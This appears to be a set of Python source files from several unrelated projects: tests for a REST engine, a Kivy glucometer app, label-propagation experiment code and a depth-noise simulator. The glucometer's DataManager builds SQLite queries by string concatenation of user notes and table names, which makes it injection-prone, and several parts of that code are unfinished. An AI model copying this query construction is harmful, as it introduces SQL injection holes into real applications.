# assert status == expected_status
#
# if status == 400:
# assert data == {'msg': not_a_donut}
```
#### File: tests/raw/test_exception.py
```python
from blargh import exceptions
from blargh.engine import Engine, dm
from blargh.data_model.fields import Scalar
from example import cookies
import pytest
class ExceptionRaiser:
'''Each method raises exception of the same name'''
def BadParamValue():
Engine.get('cookie', 1, depth=-1)
def SearchForbidden():
Engine.get('jar', filter_={'cookies': [1, 2]})
def FieldIsReadonly():
# Modify data model - cookie.type is readonly
dm().object('cookie').field('type').readonly = True
# ... and yet we still try to change it!
Engine.patch('cookie', 1, {'type': 'donut'})
def FieldUpdateForbidden():
# Modify data model - we close our jars ...
dm().object('jar').field('cookies')._writable = False
# ... and than try to remove the cookie from the jar
Engine.patch('cookie', 1, {'jar': None})
def FieldDoesNotExist():
Engine.post('cookie', {'bad_field_name': 7})
def e404():
Engine.patch('cookie', 1, {'jar': 7})
def ProgrammingError():
# field 'type' already exists
dm().object('cookie').add_field(Scalar('type'))
def e500():
# Note: maybe 4** would be more appropriate for bad 'auth' value, but
# we assume there is an intermediate layer between Engine and "user with auth",
# so bad auth on this level looks like a 500
Engine.get('jar', 1, auth='aaa')
params = [[getattr(exceptions, name), getattr(ExceptionRaiser, name)]
for name in ExceptionRaiser.__dict__ if not name.startswith('__')]
@pytest.mark.parametrize('exception, method', params)
def test_exceptions(init_world, exception, method):
init_world(cookies.dm)
with pytest.raises(exception):
method()
```
#### File: blargh/tests/test_get.py
```python
from .helpers.get import expected_get_data
from .helpers.blargh_config import init_dict_world, init_pg_world
from blargh.engine import world
from example import family, cookies
import pytest
'''
Test if there is no stupid internal GET cache (there once was)
'''
def test_get_cache(get_client):
# We use DictWorld only because we need to touch it's internals to imitate "other" application.
init_dict_world(family.dm)
client = get_client()
# 1. Initial check - first child should have name 'c1' (if has different,
# something is seriously wrong and the rest of the test makes no sence)
data, status_code, *headers = client.get('child', 1)
assert data['name'] == 'c1'
# 2. Modify data, without any blargh interface (that could clear potential cache)
world().storage._commited['child'][1]['name'] = 'new_c1_name'
# 3. Check
data, status_code, *headers = client.get('child', 1)
assert data['name'] == 'new_c1_name'
@pytest.mark.parametrize("method, args", (
('post', ('cookie', {})),
('put', ('cookie', 1, {})),
('put', ('cookie', 7, {})),
))
def test_implicit_fields_post_put(get_client, method, args):
'''
Check if fields set in a implicit way after POST/PUT (i.e. database defaults) are returned
'''
# INIT
init_pg_world(cookies.dm)
client = get_client()
# Add default column value
world().storage._conn.cursor().execute('''
ALTER TABLE cookie
ALTER COLUMN jar SET DEFAULT 1;
''')
data, status, headers = getattr(client, method)(*args)
assert status == 201
assert data['jar'] == 1
def test_implicit_fields_patch(get_client):
'''
Check if fields set in a implicit way after PATCH (i.e. by database triggers) are returned
'''
# INIT
init_pg_world(cookies.dm)
client = get_client()
# Add trigger changing type after update
world().storage._conn.cursor().execute('''
CREATE FUNCTION pg_temp.new_cookie_type() RETURNS trigger AS $new_cookie_type$
BEGIN
NEW.type = 'type_set_by_trigger';
RETURN NEW;
END;
$new_cookie_type$ LANGUAGE plpgsql;
CREATE TRIGGER change_cookie_type
BEFORE UPDATE ON pg_temp.cookie
FOR EACH ROW EXECUTE PROCEDURE pg_temp.new_cookie_type();
''')
# Create fresh cookie
data, status, headers = client.put('cookie', 4, {'type': 'donut'})
assert status == 201
assert data['type'] == 'donut'
# Make sure it's still a donut
data, status, headers = client.get('cookie', 4)
assert status == 200
assert data['type'] == 'donut'
# Patch it with some data and check if we got triggered type
data, status, headers = client.patch('cookie', 4, {'type': 'doesnt matter'})
assert status == 200
assert data['type'] == 'type_set_by_trigger'
# Make sure it's still a triggered type
data, status, headers = client.get('cookie', 4)
assert status == 200
assert data['type'] == 'type_set_by_trigger'
'''
Test returned data
'''
get_params = [
(1, 'child', dict(id_=1, depth=0)), # noqa: E241
(2, 'child', dict(id_=1, depth=1)), # noqa: E241
(3, 'child', dict(id_=1, depth=2)), # noqa: E241
(4, 'child', dict(id_=1, depth=3)), # noqa: E241
(5, 'child', dict(id_=1, depth=4)), # noqa: E241
(6, 'child', dict(depth=0)), # noqa: E241
(7, 'child', dict(depth=1)), # noqa: E241
(8, 'child', dict(filter_=dict(name='c1'))), # noqa: E241
(9, 'child', dict(filter_=dict(name='NIEMA'))), # noqa: E241
(10, 'female', dict(depth=1, filter_=dict(name='f1'))), # noqa: E241
# Note: filter is 'id', but get param is 'id_' - this is intended, 'id' is an external name
(11, 'female', dict(depth=1, filter_={'id': 2})), # noqa: E241
(12, 'child', dict(depth=0, filter_={'father': 1})), # noqa: E241
(13, 'child', dict(depth=0, filter_={'father': 1, 'name': 'c1'})), # noqa: E241
(14, 'child', dict(depth=0, filter_={'father': 1, 'name': 'c2'})), # noqa: E241
(15, 'female', dict(depth=0, filter_={'name': 'f1'})), # noqa: E241
(15, 'female', dict(depth=0, filter_={'husband': 1})), # noqa: E241
(15, 'female', dict(depth=0, filter_={'husband': 1, 'name': 'f1'})), # noqa: E241
(15, 'female', dict(depth=0, filter_={'husband': 1, 'id': 1})), # noqa: E241
(15, 'female', dict(depth=0, filter_={'husband': 1, 'id': 1, 'name': 'f1'})), # noqa: E241
(0, 'female', dict(depth=0, filter_={'husband': 1, 'id': 1, 'name': 'f2'})), # noqa: E241
(0, 'female', dict(depth=0, filter_={'husband': 3})), # noqa: E241
(0, 'female', dict(depth=0, filter_={'husband': 1, 'name': 'f2'})), # noqa: E241
(0, 'female', dict(depth=0, filter_={'husband': 1, 'id': 2})), # noqa: E241
(0, 'female', dict(depth=0, filter_={'husband': 1, 'id': 2})), # noqa: E241
(16, 'male', dict(depth=0, filter_={'name': 'm1'})), # noqa: E241
(16, 'male', dict(depth=0, filter_={'wife': 1})), # noqa: E241
(16, 'male', dict(depth=0, filter_={'wife': 1, 'name': 'm1'})), # noqa: E241
(16, 'male', dict(depth=0, filter_={'wife': 1, 'id': 1})), # noqa: E241
(16, 'male', dict(depth=0, filter_={'wife': 1, 'id': 1, 'name': 'm1'})), # noqa: E241
(0, 'male', dict(depth=0, filter_={'wife': 1, 'id': 2, 'name': 'm1'})), # noqa: E241
(0, 'male', dict(depth=0, filter_={'wife': 3})), # noqa: E241
(0, 'male', dict(depth=0, filter_={'wife': 1, 'name': 'm2'})), # noqa: E241
(0, 'male', dict(depth=0, filter_={'wife': 1, 'id': 2})), # noqa: E241
(17, 'child', dict(depth=0, filter_={'father': 1, 'mother': 1})), # noqa: E241
(18, 'child', dict(depth=0, filter_={'father': 1, 'mother': 2})), # noqa: E241
(19, 'child', dict(depth=0, filter_={'father': 2, 'mother': 2})), # noqa: E241
(0, 'child', dict(depth=0, filter_={'father': 2, 'mother': 1})), # noqa: E241
(0, 'child', dict(depth=0, filter_={'father': 3, 'mother': 1})), # noqa: E241
(0, 'child', dict(depth=0, filter_={'father': 1, 'mother': 3})), # noqa: E241
]
@pytest.mark.parametrize("data_id, resource, kwargs", get_params)
def test_base_get_family(init_world, get_client, resource, kwargs, data_id):
# Init
init_world(family.dm)
client = get_client()
# Fetch tested data
data, status_code, *headers = client.get(resource, **kwargs)
# Expected data
expected_data = expected_get_data(data_id, client)
# Test
assert status_code == 200
assert data == expected_data
``` |
{
"source": "johnyburd/glucometer",
"score": 2
} |
#### File: glucometer/classes/bg_screen.py
```python
from kivy.uix.screenmanager import Screen
from kivy.clock import Clock
from kivy.uix.button import Button
from kivy.uix.label import Label
from kivy.uix.dropdown import DropDown
from kivy.uix.popup import Popup
from .data_manager import DataManager
from .blood_glucose_tester import BloodGlucoseTester
from kivy.lang import Builder
Builder.load_file('kvfiles/bg_screen.kv')
class BGScreen(Screen):
def __init__(self, **kwargs):
super(BGScreen, self).__init__(**kwargs)
self.bgt = BloodGlucoseTester(self)
def open_popup(self):
popup = BGPopup(self.bgt)
popup.open()
class BGPopup(Popup):
def __init__(self, bgtester, **kwargs):
super(BGPopup, self).__init__(**kwargs)
self.bgt = bgtester
def start_pb(self):
event = Clock.schedule_interval(self.update_pb, 1 / 60.)
def update_pb(self, dt):
self.ids.pb.value = self.ids.pb.value + (1/3.)
if self.ids.pb.value >= 100:
self.display_BG('106')
self.ids.pb.value = 0
return False
def display_BG(self, value):
popup = Popup(title='BG',
content=Label(text=value,font_size=25),
size_hint=(None, None), size=(125, 125))
popup.bind(on_dismiss=self.dismiss_both)
popup.open()
def dismiss_both(self,instance):
self.dismiss()
return False
```
#### File: glucometer/classes/data_manager.py
```python
import sqlite3 as lite
import sys
#from scipy.stats import linregress
from numpy import empty
import math
import datetime
class DataManager:
def __init__(self):
self.con = lite.connect('data.db')
cur = self.con.cursor()
# Table for storing date, time, blood glucose value, carbs, bolus, and notes
cur.execute("CREATE TABLE IF NOT EXISTS Data(Id INTEGER PRIMARY KEY, DateColumn date, Bg INT, Carbs INT, Bolus INT, Notes Text)")
# Table for storing points with which to calibrate the meter.
cur.execute("CREATE TABLE IF NOT EXISTS CalibData(ADC INT, Actual INT)")
# Adds a new data point to the "Data" table
def new_entry(self, date, bg, carbs, bolus, notes):
self.con.execute("INSERT INTO data(DateColumn, Bg, Carbs, Bolus, Notes) VALUES ('"+date+"',"+str(bg)+","+str(carbs)+","+str(bolus)+",'"+notes+"')")
self.con.commit()
# Deletes an entry from the "Data" table
def delete_entry(self, date, bg, carbs, bolus, notes ):
self.con.execute("DELETE FROM data WHERE Id =(SELECT MIN(Id) FROM data WHERE DateColumn='%s' AND Bg=%d AND Carbs =%d AND Bolus =%d AND Notes='%s')" % (date, bg, carbs, bolus, notes))
self.con.commit()
# Adds a new data point to the "CabibData" table
def new_calib_entry(self, adc, actual):
self.con.execute("INSERT INTO CalibData(ADC, Actual) VALUES ("+str(adc)+","+str(actual)+")")
self.con.commit()
# Calculates linear regression on the "CalibData" table in the database. Returns line as a lambda object
def get_line(self):
rows = self.get_whole_table("CalibData")
x = empty([len(rows)])
y = empty([len(rows)])
index = 0
for row in rows:
x[index] = row["ADC"]
y[index] = row["Actual"]
index += 1
slope, intercept, r_value, p_value, std_err = linregress(x,y)
return lambda x: slope*x + intercept
# Returns the requested table as a dictonary object
def get_whole_table(self, table):
with self.con:
self.con.row_factory = lite.Row
cur = self.con.cursor()
cur.execute("SELECT * FROM " + table)
#SELECT * FROM data ORDER BY datetime(dateColumn);
return cur.fetchall()
# Returns the requested table ordered by a column named datetime
def get_whole_table_sorted(self, table):
with self.con:
self.con.row_factory = lite.Row
cur = self.con.cursor()
cur.execute("SELECT * FROM " + table + " ORDER BY datetime(dateColumn)")
return cur.fetchall()
# Deletes the sqlite table passed
def delete_table(self, table):
cur = self.con.cursor()
cur.execute("DROP TABLE IF EXISTS " + table)
# Sorts Table into chronological order TODO doesn't work
def sort_data_table(self):
data_table = self.get_whole_table('Data')
datetime_list = []
for entry in data_table:
datetime_list.append(self.str_to_date(str(entry["Date"]),str(entry["Time"])))
datetime_list.sort()
#self.delete_table("Data")
for entry in datetime_list:
self.new
return datetime_list
# Converts strings in the format m/d/y or m/d/y, h:m to a datetime object TODO depreciated
def str_to_date(self, strdate):
if '/' in strdate:
split_date = strdate.split('/')
m = int(split_date[0])
d = int(split_date[1])
y = int(split_date[2])
h = 0
mins = 0
if y < 100:
y = int('20' + str(y))
else:
try:
dateobj = datetime.datetime.strptime( strdate, "%Y-%m-%d %H:%M" )
return dateobj
except:
pass
try:
dateobj = datetime.datetime.strptime( strdate, "%Y-%m-%d" )
return dateobj
except:
pass
return datetime.datetime(year=y, month=m, day=d, hour=h, minute=mins)
# Testing stuff
if __name__ == "__main__":
bgm = DataManager()
rows = bgm.get_whole_table("Data")
data = (
('2016-12-01 11:44', 98, 0, 0, 'bg of 98'),
('2016-11-03 03:45', 98, 36, 9, 'bg of 98'),
('2016-11-03 12:45', 94, 24, 6, 'same notes'),
('2016-11-03 23:45', 112, 26, 7, 'notes these are them'),
('2016-10-04 23:45', 86, 13, 3, 'aeu'),
('2016-09-05 14:45', 134, 6, 2, 'none'),
('2016-10-06 23:45', 99, 6, 2, 'it was 99 today'),
('2016-10-07 23:45', 109, 12, 3, 'tomorrow is 140'),
('2016-11-08 12:45', 103, 140, 35, 'wow thats high'),
('2016-11-09 23:45', 109, 60, 15, 'testing'),
('2016-11-10 23:45', 94, 44, 11, '44, 11'),
('2016-11-03 18:45', 117, 6, 2, 'notesnotesnotes'),
('2016-11-03 19:45', 117, 6, 2, 'notesnotesnotes'),
('2016-11-04 12:45', 111, 26, 7, ' '),
('2016-11-04 20:45', 117, 6, 2, 'notesnotesnotes'),
('2016-11-05 21:45', 111, 26, 7, ' '),
('2016-11-05 22:45', 111, 26, 7, ' ')
)
#table = bgm.sort_data_table()
table = bgm.get_whole_table_sorted("Data")
for thing in table:
print thing
bgm.delete_table('Data')
bgm = DataManager()
for point in data:
bgm.new_entry(point[0],point[1],point[2],point[3], point[4])
#for row in rows:
# print "%s %s %s" % (row["Date"], row["Bg"], row["Carbs"])
#print point[0]
#bgm.delete_table('calibdata')
#bgm.new_calib_entry(1, 1)
#bgm.new_calib_entry(20, -100)
#test = bgm.get_line()
#print test(3700)
```
#### File: glucometer/classes/data_screen.py
```python
from kivy.clock import Clock
from kivy.uix.screenmanager import Screen
from kivy.uix.button import Button
from kivy.uix.popup import Popup
from kivy.uix.label import Label
from kivy.core.window import Window
from kivy.uix.boxlayout import BoxLayout
from .data_manager import DataManager
from kivy.properties import BooleanProperty
from kivy.lang import Builder
Builder.load_file('kvfiles/data_screen.kv')
class DeleteDialoguePopup(Popup):
def __init__(self, ent, **kwargs):
super(DeleteDialoguePopup, self).__init__(**kwargs)
self.entry = ent
def delete(self):
self.entry.delete()
class DateRow(BoxLayout):
def __init__(self, date, **kwargs):
super(DateRow, self).__init__(**kwargs)
dm = DataManager()
dateobj = dm.str_to_date(date)
self.ids.date.text = "%s %s, %s" % (dateobj.strftime('%B')[:3], dateobj.day, dateobj.year)
class EntryRow(BoxLayout):
widths_correct = BooleanProperty(False)
def __init__(self, date, time, b, c, bo, n, **kwargs):
super(EntryRow, self).__init__(**kwargs)
self.dm = DataManager()
self.datetime = date + ' ' + time
self.bg = b
self.carbs = c
self.bolus = bo
self.notes = n
i = self.ids
i.time.text = time
if b == 0:
i.bg.text = '--'
else:
i.bg.text = str(b)
if c == 0:
i.carbs.text = '--'
else:
i.carbs.text = str(c)
if bo == 0:
i.bolus.text = '--'
else:
i.bolus.text = str(bo)
i.notes.text = n
def refresh_widths(self):
i = self.ids
i.bg._label.refresh() # have to refresh to update texture size
i.carbs._label.refresh()
i.bolus._label.refresh()
i.notes._label.refresh()
i.layout.width = sum(x.width for x in self.ids.layout.children)
totalwidth = i.layout.width + i.time.width
print totalwidth
if totalwidth < (Window.width + i.deletebtn.width + i.editbtn.width):
i.spacer.width = Window.width - totalwidth + i.deletebtn.width + i.editbtn.width
self.refresh_widths()
def open_delete_dialogue_popup(self):
popup = DeleteDialoguePopup(self)
popup.open()
def delete(self):
self.dm.delete_entry(self.datetime, int(self.bg), int(self.carbs), int(self.bolus), self.notes)
class DataScreen(Screen):
def __init__(self, **kwargs):
super(DataScreen, self).__init__(**kwargs)
self.dm = DataManager()
self.entryrows = []
self.daterows = []
self.render_data()
Clock.schedule_once(self.update_row_widths, 8)
#self.refresh()
def render_data(self):
layout = self.ids.layout
rows = self.dm.get_whole_table_sorted("data")
lastdate = ""
rows.reverse()
for row in rows:
isodate = row["dateColumn"]
isodate_split = isodate.split(' ')
date = isodate_split[0]
time = isodate_split[1]
if date != lastdate:
lastdate = date
daterow = DateRow(date)
layout.add_widget(daterow)
self.daterows.append(daterow)
bg = row['Bg']
carbs = row['Carbs']
bolus = row['bolus']
notes = row['Notes']
entry = EntryRow(date, time, bg, carbs, bolus, notes)
layout.add_widget(entry)
self.entryrows.append(entry)
def refresh(self, *args):
for entry in self.entryrows:
self.ids.layout.remove_widget(entry)
for date in self.daterows:
self.ids.layout.remove_widget(date)
self.entryrows = []
self.render_data()
Clock.schedule_once(self.update_row_widths, 0.5)
def update_row_widths(self, *args):
for entry in self.entryrows:
entry.refresh_widths()
``` |
{
"source": "johny-c/incremental-label-propagation",
"score": 3
} |
#### File: ilp/algo/knn_graph_utils.py
```python
import numpy as np
from sklearn.metrics.pairwise import euclidean_distances
from scipy.sparse import coo_matrix
def squared_distances(X1, X2, L=None):
if L is None:
dist = euclidean_distances(X1, X2, squared=True)
else:
dist = euclidean_distances(X1.dot(L.T), X2.dot(L.T), squared=True)
return dist
def get_nearest(distances, n_neighbors):
n, m = distances.shape
neighbors = np.argpartition(distances, n_neighbors - 1, axis=1)
neighbors = neighbors[:, :n_neighbors]
return neighbors, distances[np.arange(n)[:, None], neighbors]
def find_nearest_neighbors(X1, X2, n_neighbors, L=None):
"""
Args:
X1 (array_like): [n_samples, n_features] input data points
X2 (array_like): [m_samples, n_features] reference data points
n_neighbors (int): number of nearest neighbors to find
L (array) : linear transformation for Mahalanobis distance computation
Returns:
tuple:
(array_like): [n_samples, k_samples] indices of nearest neighbors
(array_like): [n_samples, k_distances] distances to nearest neighbors
"""
dist = squared_distances(X1, X2, L)
if X1 is X2:
np.fill_diagonal(dist, np.inf)
n, m = X1.shape[0], X2.shape[0]
neigh_ind = np.argpartition(dist, n_neighbors - 1, axis=1)
neigh_ind = neigh_ind[:, :n_neighbors]
return neigh_ind, dist[np.arange(n)[:, None], neigh_ind]
def construct_weight_mat(neighbors, distances, shape, dtype):
n, k = neighbors.shape
rows = np.repeat(range(n), k)
cols = neighbors.ravel()
weights = np.exp(-distances.ravel())
mat = coo_matrix((weights, (rows, cols)), shape, dtype)
return mat
```
#### File: ilp/experiments/var_stream_labeled.py
```python
import os
import numpy as np
from time import sleep
from sklearn.utils.random import check_random_state
from ilp.experiments.base import BaseExperiment
from ilp.helpers.data_fetcher import fetch_load_data, IS_DATASET_STREAM
from ilp.helpers.params_parse import parse_yaml, experiment_arg_parser
from ilp.constants import CONFIG_DIR
from ilp.helpers.log import make_logger
logger = make_logger(__name__)
class VarStreamLabeled(BaseExperiment):
def __init__(self, ratio_labeled_values, params, n_runs=1, isave=100):
super(VarStreamLabeled, self).__init__(name='srl',
config=params,
isave=isave, n_runs=n_runs,
plot_title=r'Influence of ratio of labels',
multi_var=True)
self.ratio_labeled_values = ratio_labeled_values
def pre_single_run(self, X_run, y_run, mask_labeled, n_burn_in, seed_run,
X_test, y_test, n_run):
config = self.config
ratio_labeled = config['data']['stream']['ratio_labeled']
save_dir = os.path.join(self.top_dir, 'srl_' + str(ratio_labeled))
stats_path = os.path.join(save_dir, 'run_' + str(n_run))
logger.info('\n\nExperiment: {}, ratio_labeled = {}, run {}...\n'.
format(self.name.upper(), ratio_labeled, n_run))
sleep(1)
self._single_run(X_run, y_run, mask_labeled, n_burn_in,
stats_path, seed_run, X_test, y_test)
def run(self, dataset_name, random_state=42):
config = self.config
X_train, y_train, X_test, y_test = fetch_load_data(dataset_name)
for n_run in range(self.n_runs):
seed_run = random_state * n_run
logger.info('\n\nRANDOM SEED = {} for data split.'.format(seed_run))
rng = check_random_state(seed_run)
if config['dataset']['is_stream']:
logger.info('Dataset is a stream. Sampling observed labels.')
# Just randomly sample ratio_labeled samples for mask_labeled
n_burn_in = config['data']['n_burn_in_stream']
for ratio_labeled in self.ratio_labeled_values:
config['data']['stream']['ratio_labeled'] = ratio_labeled
n_labeled = int(ratio_labeled*len(y_train))
ind_labeled = rng.choice(len(y_train), n_labeled,
replace=False)
mask_labeled = np.zeros(len(y_train), dtype=bool)
mask_labeled[ind_labeled] = True
X_run, y_run = X_train, y_train
config['data']['n_burn_in'] = n_burn_in
config.setdefault('options', {})
config['options']['random_state'] = seed_run
self.pre_single_run(X_run, y_run, mask_labeled, n_burn_in,
seed_run, X_test, y_test, n_run)
if __name__ == '__main__':
parser = experiment_arg_parser()
args = vars(parser.parse_args())
dataset_name = args['dataset'].lower()
config_file = os.path.join(CONFIG_DIR, 'var_stream_labeled.yml')
config = parse_yaml(config_file)
# Store dataset info
config.setdefault('dataset', {})
config['dataset']['name'] = dataset_name
config['dataset']['is_stream'] = IS_DATASET_STREAM.get(dataset_name, False)
N_RATIO_LABELED = config['data']['stream']['ratio_labeled'].copy()
experiment = VarStreamLabeled(N_RATIO_LABELED, params=config,
n_runs=args['n_runs'])
if args['plot'] != '':
experiment.load_plot(path=args['plot'])
else:
experiment.run(dataset_name)
```
#### File: ilp/helpers/data_fetcher.py
```python
import os
import gzip
import zipfile
from urllib import request
import yaml
import numpy as np
from sklearn.datasets import make_classification
from sklearn.model_selection import train_test_split
from ilp.constants import DATA_DIR
CWD = os.path.split(__file__)[0]
DATASET_CONFIG_PATH = os.path.join(CWD, 'datasets.yml')
SUPPORTED_DATASETS = {'mnist', 'usps', 'blobs', 'kitti_features'}
IS_DATASET_STREAM = {'kitti_features': True}
def check_supported_dataset(dataset):
if dataset not in SUPPORTED_DATASETS:
raise FileNotFoundError('Dataset {} is not supported.'.format(dataset))
return True
def fetch_load_data(name):
print('\nFetching/Loading {}...'.format(name))
with open(DATASET_CONFIG_PATH, 'r') as f:
datasets_configs = yaml.load(f)
if name.upper() not in datasets_configs:
raise FileNotFoundError('Dataset {} not supported.'.format(name))
config = datasets_configs[name.upper()]
name_ = config.get('name', name)
test_size = config.get('test_size', 0)
if name_ == 'KITTI_FEATURES':
X_tr, y_tr, X_te, y_te = fetch_kitti()
elif name_ == 'USPS':
X_tr, y_tr, X_te, y_te = fetch_usps()
elif name_ == 'MNIST':
X_tr, y_tr, X_te, y_te = fetch_mnist()
X_tr = X_tr / 255.
X_te = X_te / 255.
elif name_ == 'BLOBS':
X, y = make_classification(n_samples=60)
X = np.asarray(X)
y = np.asarray(y, dtype=int)
if test_size > 0:
if type(test_size) is int:
t = test_size
print('{} has shape {}'.format(name_, X.shape))
print('Splitting data with test size = {}'.format(test_size))
X_tr, X_te, y_tr, y_te = X[:-t], X[-t:], y[:-t], y[-t:]
elif type(test_size) is float:
X_tr, X_te, y_tr, y_te = train_test_split(
X, y, test_size=test_size, stratify=y)
else:
raise TypeError('test_size is neither int or float.')
print('Loaded training set with shape {}'.format(X_tr.shape))
print('Loaded testing set with shape {}'.format(X_te.shape))
return X_tr, y_tr, X_te, y_te
else:
print('Loaded {} with {} samples of dimension {}.'
.format(name_, X.shape[0], X.shape[1]))
return X, y, None, None
else:
raise NameError('No data set {} found!'.format(name_))
print('Loaded training data with shape {}'.format(X_tr.shape))
print('Loaded training labels with shape {}'.format(y_tr.shape))
print('Loaded testing data with shape {}'.format(X_te.shape))
print('Loaded testing labels with shape {}'.format(y_te.shape))
return X_tr, y_tr, X_te, y_te
def fetch_usps(save_dir=None):
base_url = 'http://statweb.stanford.edu/~tibs/ElemStatLearn/datasets/'
train_file = 'zip.train.gz'
test_file = 'zip.test.gz'
save_dir = DATA_DIR if save_dir is None else save_dir
if not os.path.isdir(save_dir):
raise NotADirectoryError('{} is not a directory.'.format(save_dir))
train_source = os.path.join(base_url, train_file)
test_source = os.path.join(base_url, test_file)
train_dest = os.path.join(save_dir, train_file)
test_dest = os.path.join(save_dir, test_file)
def download_file(source, destination):
if not os.path.exists(destination):
print('Downloading from {}...'.format(source))
f, msg = request.urlretrieve(url=source, filename=destination)
print('HTTP response: {}'.format(msg))
return f, msg
else:
print('Found dataset in {}!'.format(destination))
return None
download_file(train_source, train_dest)
download_file(test_source, test_dest)
X_train = np.loadtxt(train_dest)
y_train, X_train = X_train[:, 0].astype(np.int32), X_train[:, 1:]
X_test = np.loadtxt(test_dest)
y_test, X_test = X_test[:, 0].astype(np.int32), X_test[:, 1:]
return X_train, y_train, X_test, y_test
def fetch_kitti(data_dir=None):
if data_dir is None:
data_dir = os.path.join(DATA_DIR, 'kitti_features')
files = ['kitti_all_train.data',
'kitti_all_train.labels',
'kitti_all_test.data',
'kitti_all_test.labels']
for file in files:
if file not in os.listdir(data_dir):
zip_path = os.path.join(data_dir, 'kitti_features.zip')
target_path = os.path.dirname(zip_path)
print("Extracting {} to {}...".format(zip_path, target_path))
with zipfile.ZipFile(zip_path, "r") as zip_ref:
zip_ref.extractall(target_path)
print("Done.")
break
X_train = np.loadtxt(os.path.join(data_dir, files[0]), np.float64, skiprows=1)
y_train = np.loadtxt(os.path.join(data_dir, files[1]), np.int32, skiprows=1)
X_test = np.loadtxt(os.path.join(data_dir, files[2]), np.float64, skiprows=1)
y_test = np.loadtxt(os.path.join(data_dir, files[3]), np.int32, skiprows=1)
return X_train, y_train, X_test, y_test
def fetch_mnist(data_dir=None):
if data_dir is None:
data_dir = os.path.join(DATA_DIR, 'mnist')
url = 'http://yann.lecun.com/exdb/mnist/'
files = ['train-images-idx3-ubyte.gz',
'train-labels-idx1-ubyte.gz',
't10k-images-idx3-ubyte.gz',
't10k-labels-idx1-ubyte.gz']
# Create path if it doesn't exist
os.makedirs(data_dir, exist_ok=True)
# Download any missing files
for file in files:
if file not in os.listdir(data_dir):
request.urlretrieve(url + file, os.path.join(data_dir, file))
print("Downloaded %s to %s" % (file, data_dir))
def _images(path):
"""Return flattened images loaded from local file."""
with gzip.open(path) as f:
# First 16 bytes are magic_number, n_imgs, n_rows, n_cols
pixels = np.frombuffer(f.read(), '>B', offset=16)
return pixels.reshape(-1, 784).astype('float64')
def _labels(path):
with gzip.open(path) as f:
# First 8 bytes are magic_number, n_labels
integer_labels = np.frombuffer(f.read(), '>B', offset=8)
return integer_labels
X_train = _images(os.path.join(data_dir, files[0]))
y_train = _labels(os.path.join(data_dir, files[1]))
X_test = _images(os.path.join(data_dir, files[2]))
y_test = _labels(os.path.join(data_dir, files[3]))
return X_train, y_train, X_test, y_test
```
#### File: ilp/helpers/fc_heap.py
```python
import heapq
import warnings
class FixedCapacityHeap:
"""Implementation of a min-heap with fixed capacity.
The heap contains tuples of the form (edge_weight, node_id),
which means the min. edge weight is extracted first
"""
def __init__(self, lst=None, capacity=10):
self.capacity = capacity
if lst is None:
self.data = []
elif type(lst) is list:
self.data = lst
else:
self.data = lst.tolist()
if lst is not None:
heapq.heapify(self.data)
if len(self.data) > capacity:
msg = 'Input data structure is larger than the queue\'s ' \
'capacity ({}), truncating to smallest ' \
'elements.'.format(capacity)
warnings.warn(msg, UserWarning)
self.data = self.data[:self.capacity]
def push(self, item):
"""Insert an element in the heap if its key is smaller than the current
max-key elements and remove the current max-key element if the new
heap size exceeds the heap capacity
Args:
item (tuple): (edge_weight, node_ind)
Returns:
tuple : (bool, item)
bool: whether the item was actually inserted in the queue
item: another item that was removed from the queue or None if none was removed
"""
inserted = False
removed = None
if len(self.data) < self.capacity:
heapq.heappush(self.data, item)
inserted = True
else:
if item > self.get_min():
removed = heapq.heappushpop(self.data, item)
inserted = True
return inserted, removed
def get_min(self):
"""Return the min-key element without removing it from the heap"""
return self.data[0]
def __len__(self):
return len(self.data)
```
#### File: ilp/helpers/log.py
```python
import sys
import logging
def make_logger(name, path=None):
logger = logging.getLogger(name)
logger.setLevel(logging.DEBUG)
stream_handler = logging.StreamHandler(stream=sys.stdout)
# fmt = '%(asctime)s ' \
fmt = '[%(levelname)-10s] %(name)-10s : %(message)s'
# fmt = '[{levelname}] {name} {message}'
formatter = logging.Formatter(fmt=fmt, style='%')
stream_handler.setFormatter(formatter)
logger.addHandler(stream_handler)
if path:
file_handler = logging.FileHandler(filename=path)
file_handler.setFormatter(formatter)
logger.addHandler(file_handler)
return logger
``` |
{
"source": "johny-c/minos",
"score": 3
} |
#### File: lib/simdepth/simredwood.py
```python
import numpy as np
import glob
import os
from PIL import Image
from sys import argv
from multiprocessing import Pool
class RedwoodDepthNoiseSim:
def __init__(self, model_filename=None):
self.distmodel = None
if model_filename is not None:
self.loaddistmodel(model_filename)
'''Loads distortion model'''
def loaddistmodel(self, fname):
data = np.loadtxt(fname, comments='%', skiprows=5)
dist = np.empty([80, 80, 5])
for y in range(0, 80):
for x in range(0, 80):
idx = (y * 80 + x) * 23 + 3
if (data[idx:idx + 5] < 8000).all():
dist[y, x, :] = 0
else:
dist[y, x, :] = data[idx + 15: idx + 20]
self.distmodel = dist
def distort(self, x, y, z):
i2 = int((z + 1) / 2)
i1 = i2 - 1
a = (z - (i1 * 2 + 1)) / 2
x = int(x / 8)
y = int(y / 6)
f = (1 - a) * self.distmodel[y, x, min(max(i1, 0), 4)] + a * self.distmodel[y, x, min(i2, 4)]
if f == 0:
return 0
else:
return z / f
'''Reads and simulate noise on inputpng and write output to outputpng'''
def process_image(self, inputpng, outputpng):
# convert from grayscale uint8 to float32
a = np.array(Image.open(inputpng)).astype(np.float32) / 1000.0
self.simulate(a)
Image.fromarray((a * 1000).astype(np.int32)).save(outputpng)
'''Simulate noise over depth values in buffer and modifies it'''
def simulate(self, buffer):
a = buffer
b = np.copy(a)
it = np.nditer(a, flags=['multi_index'], op_flags=['writeonly'])
ymax = buffer.shape[0] - 1
xmax = buffer.shape[1] - 1
while not it.finished:
# pixel shuffle
x = min(max(round(it.multi_index[1] + np.random.normal(0, 0.25)), 0), xmax)
y = min(max(round(it.multi_index[0] + np.random.normal(0, 0.25)), 0), ymax)
# downsample
d = b[y - y % 2, x - x % 2]
# distortion
d = self.distort(x, y, d)
# quantization and high freq noise
if d == 0:
it[0] = 0
else:
denom = round((35.130 / d + np.random.normal(0, 0.027778)) * 8)
if denom != 0:
it[0] = 35.130 * 8 / denom
else:
it[0] = d
it.iternext()
return a
if __name__ == "__main__":
if (len(argv) < 4):
print('Usage: {0} <input png dir> <output png dir> <distortion model>'.format(argv[0]))
exit(0)
s = RedwoodDepthNoiseSim()
s.loaddistmodel(argv[3])
ifiles = glob.glob(argv[1] + '/*.png')
ofiles = [argv[2] + '/' + os.path.basename(f) for f in ifiles]
print('Processing %d files' % len(ifiles))
param = zip(ifiles, ofiles)
p = Pool(8)
p.starmap(s.process_image, param)
```
